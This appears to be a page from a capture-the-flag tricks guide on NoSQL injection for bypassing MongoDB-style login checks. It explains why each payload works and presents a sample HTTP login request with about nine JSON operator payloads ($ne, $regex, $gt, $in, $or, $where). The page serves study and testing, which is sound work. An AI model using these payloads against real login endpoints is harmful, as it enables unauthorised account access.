> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/nosql-injection/trick-0067.md).

# NoSQL Injection Authentication Bypass

***

NoSQL databases like MongoDB often process query parameters embedded within JSON data. Authentication bypass can sometimes be achieved by injecting operators that cause the query logic to evaluate as true without knowing the correct credentials. A common technique involves sending JSON data containing operators like `$ne` (not equal).

For a typical login endpoint expecting JSON input, setting the `Content-Type` header to `application/json` and using a payload like `{"username": {"$ne": null}, "password": {"$ne": null}}` can bypass checks that simply require the fields to exist and be non-null, as the `$ne` operator evaluates to true for any existing value. This works because the database query might look something like `db.collection.find({ username: { $ne: null }, password: { $ne: null } })`, which matches any user with non-null username and password fields.

```http
POST /login HTTP/1.1
Host: [target_host]
Content-Type: application/json
Content-Length: ...

{"username": {"$ne": null}, "password": {"$ne": null}}
```

Beyond `$ne`, other operators can be leveraged. For instance, the `$eq` (equals) operator can be used in combination with `$ne` to target a specific username while bypassing the password check.

```json
{"username": {"$eq": "admin"}, "password": {"$ne": null}}
```

This payload attempts to match the username "admin" exactly, while asserting that the password is not null, which is typically true for any existing user.

The `$regex` operator is also powerful for bypassing username checks. It allows matching patterns rather than exact strings. A common pattern is to match the administrator username using a regular expression.

```json
{"username": {"$regex": "admin"}, "password": {"$ne": null}}
```

Another approach involves using comparison operators like `$gt` (greater than). If the password field is stored in a way that allows alphabetical or numerical comparison, injecting `$gt` can sometimes bypass the check. For example, comparing the password to an empty string might evaluate to true for any non-empty password.

```json
{"username": "admin", "password": {"$gt": ""}}
```

Variations of these can include comparing the password to a non-existent value like an integer using `$ne`:

```json
{"username": "admin", "password": {"$ne": 1}}
```

Or using `$gt` with a character:

```json
{"username": "admin", "password": {"$gt": "a"}}
```

The `$in` operator can also be used to specify a list of possible values for a field. While often used for legitimate queries, it can be crafted for bypass, for example, by including `null` or a known valid username in the list for the username field:

```json
{"username": {"$in": [null, "admin"]}, "password": {"$ne": null}}
```

The `$or` operator is particularly versatile as it allows combining multiple conditions. An attacker can use `$or` to create a query that evaluates to true if *either* the username is correct *or* some other condition is met that bypasses the password check:

```json
{"$or": [ {"username": "admin"}, {"password": {"$ne": null}} ]}
```

A more advanced technique involves the `$where` operator, which allows executing arbitrary JavaScript code within the query. This can be exploited to perform checks that don't require knowing the password, such as verifying the existence or properties of the user object within the database context:

```json
{"username": "admin", "$where": "db.users.findOne({_id:this._id}).password.length > 0"}
```

This `$where` payload attempts to find the current user object (`this._id`) and check if its password field has a length greater than 0, effectively bypassing the need to provide the actual password value.

These techniques exploit how NoSQL databases evaluate expressions, allowing attackers to craft queries that evaluate to true without possessing the legitimate credentials.
